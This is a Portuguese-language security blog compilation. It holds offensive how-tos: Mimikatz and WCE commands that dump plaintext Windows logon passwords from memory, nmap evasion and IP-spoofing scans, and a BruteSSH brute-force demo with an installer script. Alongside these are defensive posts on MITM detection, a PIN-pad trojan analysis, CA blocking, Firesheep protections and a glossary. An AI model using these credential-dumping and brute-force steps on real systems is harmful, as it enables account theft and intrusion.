Recuperando senhas do Windows em texto plano

Trago aqui 2 ferramentas muito uteis para se ver o login e senha de usuarios que se autenticaram no Windows.

A primeira é a Mimikatz,ela se  aproveita dos prestadores de serviços TSPKG e WDigest , que usam credenciais armazenados na memória de todos os usuários que foram autenticados no sistema, tanto localmente quanto via desktop remoto. Sim, é verdade que não é armazenado escamcaradamente, mas de uma maneira reversível.

Para executar esta aplicação com permissões suficientes (no caso, não tenha) nada como puxar o nosso velho e bom LIVE CD do Linux.

Já com um usuário administrador pode prosseguir sem problemas na extração das credenciais da máquina.

Uma vez autenticado com um gerenciador de usuários, você irá copiar Mimikatz (não requer instalação). Quando aberta, você terá que executar o mimikatz.exe.

Uma vez lá dentro, ele abre um prompt onde você introduz as seguintes 3 comandos:

  • privilege::debug
  • inject::process lsass.exe sekurlsa.dll
  • @getLogonPasswords

A outra ferramenta é a Windows Credential Editor (WCE) que está na versão (versión 1.3) que inclui, entre suas muitas funções o mesmo como aqueles usados para recuperar as credenciais Mimikatz limpar um usuário do Windows que está autenticado no sistema.

A nova versão do WCE (disponível tanto para 32 bits para 64 bits), é caracterizada como nas versões anteriores por causa de sua simplicidade. Para executar o programa só tem que copiar o download para seu computador. Então, com um usuário com debug (igual na ferramenta anterior), execute o aplicativo adicionando o argumento “-w”:

wce.exe –w

Então, se não houve problema deve ver o nome de usuário e senha em claro

Más silenciosa impossivel :)

Marmita – Detectando ataques man in the middle

Os ataques man in the middle dão muita brecha para se realizar muitos ataques. Desde simplesmente fazer um man in the middle para ver que transações realiza un cliente. Outras técnicas se baseiam na  idea de un man in the middle, por exemplo quando certos trojans realizam ataques MITB, quando infectam a máquina são capazes de modificar as páginas webs que recebe no navegador da víctima.

Neste esquema podemos ver como actúa um ataque man in the middle:

No primeiro esquema, temos uma rede LAN, a qual temos dois usuarios. O usuario Devil User tentará fazer um ataque de man in the middle a outro user. Se o ataque se relizar o esquema ficará assim:

Para detectar estes tipos de ataque na LAN podemos usar varios métodos, um deles é o software Marmita.

Marmita se encarga de monitorar o HOST por si é atacado por um ataque man in the middle.

Para baixar o Marmita pode clicar aquí

Como requisito, é necessário ter instalado Winpcap

A ferramenta possui este apecto:

A ferramenta oferece varias opções, como iniciar junto ao sistema operacional.

Marmita tem este aspecto:

A ferramenta é bastante intuitiva e podemos rápidamente ter acesso a información que nos interesa directamente.

Por exemplo a informação da tabela ARP

Quando Marmita detecte o ataque man in the middle dará um aviso bastante claro, através de un globo de notificação

Marmita tentará identificar quem está fazendo o ataque Man in the middle, este ataque seráregistrado nos logs, para poder consultar mas tarde.

Marmita tem uma janela de histórico de ataques, onde podremos consultor todo o historico. Neste historico tem detalhado a hora, o MAC, o tipo de ataque, o nome do atacante…

Existe uma opção de que Marmita possa mitigar os ataques man in the middle. Neste caso observamos como Marmita detecta o ataque ARP Poisoning.

Sem dúvidas uma ferramnta muito útil para o sistema Windows, te animo a experimentá-la

Saudações.

Dicas do Nmap

Aqui vão alguns comando basicos do nmap,depois posto alguns mais complexos, uma dica:
* se vc quiser salvar o resultado em um arquivo basta redirecionar a saida, no final de cada linha de comando colocar >nome.txt se o arquivo existir será sobrescrito se nao existir sera criado.

Ping Sweeping
nmap -sP 192.168.0.1-254

O nmap envia ICMP Echo Request e TCP ACK para os hosts que estão sendo scaneado (1 – 254). O host que responder será considerado pelo nmap como ativo.

nmap –sP –PT80 192.168.0.24/24

As vezes ping (ICMP) são bloqueados pelos roteadores/firewall, então para evitar isso pode–se usar a opção de enviar somente um ACK. O host que responder será considerado pelo nmap
como ativo.

TCP Scan
nmap –sT 192.168.0.24

Faz uma scan (varredura) a procura de portas TCP abertas. Esse método é facilmente detectado pela vitima.

UDP Scanning
nmap –sU 192.168.0.1

Esse método é bastante usado para procurar brechas em portas abertas UDP tais como rpcinfo e Back Orifice. Um fator negativo dessa opção é a morosidade para obter as informações devido a maioria das maquinas Unix limitar o faixa de erros ICMP. Portanto, ao detectar esse faixa limite o próprio nmap diminui o envio de pacotes para não causar um overflow na vitima.

Stealth Scanning
nmap –sS –O target.com

scaneia (varredura) por portas abertas com opção (-O) OS fingerprinting.

nmap –sS –p 21-25,80,135-139,443 192.168.0.24

Scaneia (varredura) portas especificadas com a opção -p. O nmap apresenta um resultado rápido quando se determina as portas desejadas para o scan.
* Esses são métodos usado de TCP SYN e proporciona um nível menor de detecção devido ao 3 way handshake nunca se finaliza por completo. O método consiste no envio de pacote SYN o qual representa o primeiro passo do processo de 3 way handshake. As porta que estiverem abertas responderão com um pacote de SYN|ACK Porem,o atacante retorna um pacote de RST ao invés de ACK, o qual termina a conexão. Com isso o nmap consegue determinar as portas que estão ouvindo.

OS Fingerprinting
nmap –sS –O target.com

Esse opção (-O) de fingerprinting é bastante útil para aqueles que estão familiarizados com um especifico sistema e seus bugs. Executando o nmap com essa opção de fingerprinting, o mesmo tenta descobrir o Sistemas Operacional do servidor da vitima que esta rodando. De posse do nome e versão do S.O. da vitima, fica mais fácil para o atacante procurar por bugs e outras ferramentas para completar o attack.

Ident Scanning
nmap -sT -p 80 -I -O target.com

O atacante pode procurar por um especifico processo; por exemplo, um servidor de web rodando
com privilegio root.Se a vitima estiver rodando identd, o atacante usando o nmap será capaz de descobrir o dono do http daemon com a opção “-I”.

Outras Opções
nmap -p 25,53 -sX -P0 -D 1.2.3.4,5.6.7.8 192.168.0.100
# 1.2.3.4 5.6.7.8 forjando um falso source IP

nmap –v target.com
# scaneia todas portas reservadas de TCP *** -v = verbose on

nmap –v –randomize_hosts –p 80 ‘*.*.2.3-5’
# scaneia (varredura) randomicamente por específica faixa de IP

nmap –F target.com/24
# executa tcp scan (varredura)

nmap –P0 ‘192.168.[12-30].*’
# procura por hosts ativos das classes adjacentes

nmap –P0 192.168.0-50.0-255
# mesma opção usada no item anterior porem sem usar apostrofes

O alcance de um Scan pode ser desde a porta 0 até a porta 65535, podendo limitar o Scan da forma que lhe for conveniente, como por exemplo escaneando somente portas altas em busca de serviços “escondidos”.

Informações sobre determinada porta: nmap -sV -p *Porta* *IP Alvo*

Burlando Firewalls: nmap -sS -P0 -p *Porta(s)* *IP Alvo*

Muitos Firewalls atuais descartam todos os pacotes recebidos, fazendo com que o Scan se torne extremamente lento, a fim de tentar burlar essa proteção podemos utilizar o comando -P0, porém o Scan usando este método demora muito mais do que o normal, já que, por não receber respostas, ele precisa aguardar um tempo muito maior antes de passar para a porta seguinte. Mas cuidado, apesar de não responder, o computador remoto pode ser configurado para logar suas tentativas, permitindo que o administrador tome conhecimento e aja de acordo com a situação.

Fragmentando pacotes: nmap -sS -f -p *Porta(s)* *IP Alvo*

A opção -f faz com que o Scan solicitado (incluindo Scans usando Ping) utilize pequenos pacotes IP fragmentados. A idéia é dividir o cabeçalho TCP em diversos pacotes para tornar mais difícil para os filtros de pacotes, os sistemas de detecção de intrusão, e outros aborrecimentos, detectar o que você está fazendo. Tenha cuidado com isto! Alguns programas tem problemas para lidar com estes pequenos pacotes.

Disfarçando IP de origem: nmap -PN -sS -S <Endereço_IP> -p *Porta(s)* *IP Alvo*

Em algumas circunstâncias, o Nmap pode não conseguir determinar o seu endereço de origem (o Nmap irá dizer se for esse o caso). Nesta situação, use o -S com o endereço IP da interface que você deseja utilizar para enviar os pacotes. Outro uso possível para esta flag é para disfarçar o Scan e fazer com que os alvos achem que alguma outra pessoa está escaneando-as. Imagine uma empresa que está constantemente sofrendo Scan de portas de um concorrente! A opção -e normalmente seria requerida para este tipo de uso e -P0 seria recomendável.

Ataque SSH por Bruteforce com BruteSSH

Ssh_console

Introdução
BruteSSH é um script feito em python que é capaz de fazer brute-force no serviço SSH. Para uma simples demo, irei realizar o ataque em minha própria máquina (127.0.0.1)

Instalando o BruteSSH
Abra o terminal e faça o download do arquivo pelo comandos a seguir:

 

Agora vamos decompactar o arquivo:

1
root@bt:~# tar -jxvf brutessh-0.5.tar.bz2

Depois basta entrar no diretório

1
2
root@bt:~# cd brutessh
root@bt:~/brutessh#

Agora é só rodar o script feito em python (py):

1
root@bt:~/brutessh# python brutessh.py

Se você observar, os parâmetros são bem simples. Vamos lá mostrar alguns.

1
2
3
-h: Host destino
-u: Usuário
-d: Arquivo de senha

Ps: Criei um script capaz de instalar o BruteSSH automaticamente.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/bin/bash
# Por Jarlley Ribeiro - 0fx66
clear
echo "  [        Brute install                  ]"
echo "  [       0fx66 - www.0fx66.blogspot.com  ]"
echo ""
echo " [*]  Downloadind BruteSSH. Please Wait..."
wget http://www.edge-security.com/soft/brutessh-0.5.tar.bz2 1&gt; /dev/null 2&gt; /dev/stdout
echo " [*]  Unpacking Brutessh. Please Wait..."
tar -jxvf brutessh-0.5.tar.bz2 1&gt; /dev/null 2&gt; /dev/stdout
echo " [*]  OK!"
echo " [*]  To run, use: python brutessh.py"
echo "  Exiting.."

Agora basta você da as permissões necessárias (x = execução) para executar o script.

1
root@bt:~/aaa# chmod +x brutessh_Install.sh

Ataque!
Uso o serviço SSH do BackTrack com login e senha padrão (root e toor), então vou criar uma pequena world list com a senha correspondente.

Agora vamos disparar o ataque usando a seguinte sintaxe:

1
root@bt:~/brutessh# python brutessh.py -h 127.0.0.1 -u root -d password

Onde os parâmetros foram explicados acima. O resultado foi:

No campo “Password Found”, ele exibe a senha quebrada (toor).

Finalizando
Com uma ótima word list e paciência, você pode rapidamente conseguir acesso ao sistema por ssh, para se proteger, evite usar senhas de fáceis caracteres (toor, 123, 321) e mude sua senha regulamente.

Fonte:INW

O vírus chupa cabra – ataques contra dispositivos de pagamento

Você provavelmente já ouviu falar sobre o ‘Chupa Cabra’, uma criatura mítica que supostamente habita alguns países da América Central. Em tempos recentes chegou-se a anunciar que a tal criatura foi capturada em Porto Rico. Essa história é bastante popular em partes do México e nos Estados Unidos, especialmente entre as comunidades latino-americanas. O nome “chupa cabra” também foi adotado pelos carders brasileiros (criminosos especializados em clonar cartões de crédito) para designar equipamentos instalados em caixas eletrônicos. Eles usam esse nome porque o “chupa cabra” instalado nesses caixas irá “chupar” as informações do cartão de crédito da vítima.

É muito comum encontrar matérias na imprensa mostrando criminosos sendo presos por instalarem dispositivos “chupa cabras” em caixas eletrônicos de bancos. Alguns desses criminosos são incompetentes ou sem sorte e muitas vezes são pegos pelas câmeras de segurança, ou até mesmo pela polícia, como os que aparecem no vídeo abaixo:

De fato instalar um chupa cabra em um caixa eletrônico é um negócio arriscado para esses criminosos. E é exatamente por isso que os carders brasileiros juntaram forças com os criadores de códigos maliciosos no país para desenvolver um jeito mais fácil e seguro de roubar informações e clonar cartões de créditos. Dessa cooperação nasceu o “vírus chupa cabra”.

A idéia do vírus é simples: ao invés de se arriscarem instalando um chupa cabra em caixas eletrônicos, os criminosos desenvolveram uma maneira de instalar códigos maliciosos em computadores usando Windows. Esses códigos maliciosos tem a função de interceptar a comunicação de PIN Pads – dispositivos do tipo usamos para pagar contas em supermercados, postos de gasolina, lugares onde se aceita cartões de crédito e débito.

O vírus chupa cabra foi primeiramente detectado no Brasil em Dezembro de 2010, sendo detectado como Trojan-Spy.Win32.SPSniffer e possui 4 variantes (A, B, C e D). Geralmente esse vírus é altamente especializado e distribuído para alvos pré-estabelecidos. Infelizmente esse tipo de ataque está em franco crescimento – já sabemos de casos confirmados nos Estados Unidos usando a mesma técnica, e provavelmente há casos similares em outros lugares do mundo.

Claro que os PIN Pads são protegidos pelos fabricantes. Esses equipamentos possuem recursos de hardware e software para assegurar que as chaves de segurança sejam apagadas caso alguém tente abrir ou adulterar o dispositivo. De fato, o PIN (a senha) é criptografado imediatamente ao ser digitado no teclado do dispositivo, usando uma variedade de esquemas criptográficos e chaves simétricas. Geralmente os dispositivos usam um encoder triple DES, tornando muito difícil descobrir qual foi o PIN inserido no dispositivo, no ato da operação.

Mas havia um problema: estes dispositivos sempre são conectados a um computador através de porta USB ou serial, que se comunica com um software de TEF (Transferência eletrônica de fundos). PIN Pads antigos e desatualizados, ainda utilizados no Brasil nessa data eram vulneráveis a uma falha de design: eles não costumavam criptografar alguns dados do seu cartão, como o “Track 1”, enviando-os em modo “texto plano” para o computador.

Os dados “Track 1” de um cartão de crédito e os dados públicos do CHIP não eram criptografados no hardware desses PIN Pads. Esses dados geralmente são o número de cartão de crédito, a data de expiração, o service code e o CVV (Card Verification Value), resumidamente, capturando esses dados eram suficientes para que um criminoso pudesse clonar seu cartão e começar a gastar seu dinheiro.

O malware instalava um simples driver sniffer na porta serial ou USB, geralmente adaptados de softwares comerciais legítimos como o Eltima e o TVicPort, “chupando” toda a informação que trafegava entre o PIN Pad e o computador. As primeiras versões do vírus “chupa cabra” também instalava um controle Active X e uma DLL maliciosa para roubar todas as informações transmitidas em todas as portas seriais do computador, não importam qual dispositivo estivesse conectado nelas.

As novas versões do “virus chupa cabra” usavam o driver do TVicCommSpy (software legítimo, usado por desenvolvedores) com o mesmo objetivo: capturar os dados transmitidos via porta USB:

Adicionalmente a DLL maliciosa também gravava todas as informações digitadas no teclado, atuando como um keylogger. Todos os dados capturados da Track 1 dos cartões de crédito e as informações dos computadores infectados eram gravadas em um arquivo e enviadas para o criminoso, geralmente através de e-mail.

Para se assegurar de que as informações roubadas seriam enviadas em um modo “seguro”, o vírus usava um sistema simétrico de criptografia, com um nome de chave Unicode muito interessante: Robin Hood.

Uma vez que o problema foi detectado, as companhias de cartão de crédito no Brasil passaram a instalar atualizações de firmware nos PIN Pads vulneráveis. Essa atualização corrigiu o problema por completo.

Essa é a história real do Trojan-Spy.Win32.SPSniffer, o vírus chupa cabra, que foi desenvolvido numa parceria entre os carders e criadores de vírus brasileiros. Mas uma parceria entre a Kaspersky Lab e uma companhia líder no segmento de cartões de crédito no Brasil proveu detecção e remoção do código malicioso.

Fonte:Kaspersky

Bloqueando autoridade certificadora por país

Quando trabalhamos com o nosso sistema operacional , acessamos a vários sites, muitos dos quais temos acesso via HTTPS, eu me lembro quando no suporte o cara liga pra você e fala:

“Se aparecer o cadeado, então você está seguro”

A questão da CA é uma piada, especialmente porque, por padrão aceitamos várias entitades como de confiança.

Numa conversa do pessoal do Flu Project , eles verificam as seguintes problematicas:

Problemas relacionados com o gerenciamento de certificados SSL (não verificabilidade , falsa sensação de segurança, falhas no processo de registro)
Problemas com certificados de PKCS # 12
Problemas com comunicações seguras e cifradas (ataques avançados MITM)
Vetores práticos de ataque sobre SmartCards (DNI-e)

Por isso apresento a vocês uma ferramenta SSLcop que se encarrega de bloquear as CA por procedencia.

Veja a ferramenta:

A ferramenta fornece um método muito fácil de bloquear as CA por origem geográfica.

Por exemplo, nós marcamos todos, menos a Espanha, e bloquear.

Desta forma, pode facilmente bloquear todo o CA, que fácil.

A ferramenta pode ser baixada AQUI

Fonte:FluProject

Três alternativas para se proteger do Firesheep

Alternativa 1: Utilizar o plugin NoScript no Firefox e configurar:

NoScript->Options->Advanced->HTTPS

Force the following sites to use secure (HTTPS) connections:
twitter.com
*.twitter.com
google.com
*.google.com
facebook.com
*.facebook.com


Alternativa 2: Instalar o plugin HTTPS Everywhere no Firefox;

Alternartiva 3: Não usar twitter, facebook, gmail e qualquer serviço que não utilize sempre canal seguro para comunicação em redes públicas, ou sempre verificar se o seu acesso é sempre via https ou através de VPN.

Apresentação sobre o Firesheep realizada na Toorcon aqui.

O ataque do Firesheep não é novidade, apenas facilitou com poucos cliques o que já era possível fazer a mão e escancarou o problema. E o Firesheep também não é único, também existe a ferramenta Idiocy, feita em python.

Para os desenvolvedores Web:

– Todos os cookies das aplicações devem estar com a flag “Secure” especificada.

– Outro cuidado é também especificar a flag “HTTPOnly” nos cookies, para evitar ataques do tipo XSS (cross-site scripting).

Para maiores referências, verifiquem a página da OWASP: http://www.owasp.org/index.php/Testing_for_cookies_attributes_%28OWASP-SM-002%29

Fonte:Jczucco

Conheça alguns nomes/termos utilziados na área de segurança

Hacker: Individuo com amplo conhecimento em informática, que faz uso desse conhecimento para encontrar falhas e medidas de correção para essas falhas. Normalmente um Hacker atua na área de Segurança da Informação sendo um consultor de segurança ou prestando serviço para uma empresa do ramo.

Cracker: Como os Hackers, os Crackers também possuem um conhecimento avançado em informática, porem as suas atitudes são diferentes, os Crackers usam o seu conhecimento apenas para beneficio próprio ou destruição, ao invés de desenvolver medidas de correção para uma vulnerabilidade, os Crackers criam códigos para explorar essa vulnerabilidade e conseguir destruir o sistema alvo, ou conseguir algo de valor como informações pessoais, informações bancárias, senhas, etc.

Carder:
O nome Carder é dado para a pessoa que utiliza informações bancárias como números de cartões de crédito, cartões de conta corrente ou poupança, ou contas em sites de movimentações bancárias, para beneficio próprio como comprar produtos, fazer transferência para contas de laranjas entre outros atos ilícitos. Uma coisa bem interessante que tem na Internet para download são geradores de cartões de crédito, alguns são até verdade, mas a maioria são arquivos maliciosos que podem prejudicar o seu computador.

Defacer: O Defacer é o individuo que utiliza a tecnica Deface para pichar sites, eles exploram vulnerabilidades através de técnicas para conseguir acesso administrativo a um site para alterar a página inicial do mesmo, por uma que ele (invasor) criou. Normalmente a página criada pelo invasor serve como um meio ilícito de protesto contra o site ou ideologia do site, e é claro nessa mesma página tem uma frase de vitória seguida do nickename do invasor. A maior parte das vulnerabilidades em sites da Internet são SQL e PHP Injection.

Phreaker: O Phreaker é o Hacker da telefonia móvel e fixa. Os Phreakers utilizam técnicas para burlar os sistemas de segurança das companhias telefônicas, normalmente para fazer ligações de graça ou conseguir créditos.

Cheater:
O nome Cheater é dado as pessoas que usam cheats (códigos que burlam o sistema de um jogo), para adquirir algum privilégio no jogo online ou local, ou seja, Cheats são trapaças, logo, Cheater são os trapaceiros.

Lammer:
Ao contrário do Hacker e do Cracker o Lammer não possui um bom conhecimento em informática, ele apenas procura tutoriais na Internet que ensinam a fazer invasões básicas, e quando ele consegue fazer a invasão ele se auto denomina Hacker, mas é claro, ele esta enganando apenas ele mesmo. Normalmente os Lammers não possuem uma sede de conhecimento, eles querem apenas fazer algo e pronto, se deu certo tranquilo, se não deu, vai para outra técnica, sem ao menos saber como a mesma funciona e porque não deu certo.

Noob: O Noob ou Neewbie é aquele individuo que esta iniciando (no nosso caso em Hacking) e possui uma boa sede de conhecimento, não se denomina Hacker e sabe que ainda tem muito a aprender. Normalmente os Noobs fazem perguntas bobas e iniciantes em fóruns, comunidades e sites. Caso você seja um noob não tem vergonha, todos passam por essa fase, só tome cuidado para não se tornar um Lammer.

Script Kiddie: Para entender bem o que é um script kiddie, nós podemos usar o noob como exemplo, os noobs são como aprendizes de Hacker, já os Script Kiddies são como aprendizes de Crackers. Normalmente essas pessoas utilizam técnicas que elas ainda não dominam para prejudicar computadores e também obter benefícios próprios, mas como se tratando de Crackers não há lei, a maioria dos Script Kiddies caem em armadilhas deixadas pelos Crackers e acabam sendo invadidos, ou até mesmo usados como escudo nas invasões dos Crackers, por exemplo, o Cracker invade um sistema grande usando um script kiddie como um zumbi primário, dessa forma o principal culpado das invasões será o Script Kiddie que foi invadido.

Esses são os nomes mais conhecidos. Muitas pessoas dizem que esses nomes não são precisos, que é pura bobagem e que Cracker e Hacker é tudo a mesma coisa, mas eu aposto que essas pessoas não gostariam de serem chamadas de ladrões ou bandidos sem nunca terem cometido algum delito!

Metasploit Framework Expert Certification DVD – liberado gratis!

Um DVD contando mais de 2GB com um conjunto de aulas focados no Metasploit foi liberado para download. Vivek, matenedor do Securitytube, e autor de alguns livros e dezenas de cursos, liberou uma edição comunity do seu mais do que comentado e recomendado curso Metasploit Framework Expert Certification DVD.

Fiz este curso e baixei o DVD que foi liberado para os alunos, mas fiquei curioso sobre o conteúdo deste outro DVD, versão community, com o que possuo. Será que há diferença mesmo ?

Well, isso não importa agora, mas sim que vocês terão acesso a um excelente curso de Metasploit, e o mais legal, de graça.

Sei que vocês estão curiosos e já querem fazer o download do carinha, então é só clicar neste link, mas se preparem, são 2.2GB de dados.

Informação importante, todo o curso é em inglês.

Fonte:CorujadeTi

Confira alguns videos da Clavis sobre segurança

A Claves tme feitos vários webinars. O webinar é realizados com a mesma infra-estrutura de um treinamento EAD da Academia Clavis. É portanto uma excelente oportunidade para que você conheça o sistema utilizado pela Academia Clavis Segurança da Informação.

Para acessar o vídeo dos mesmos, basta acessar os links abaixo.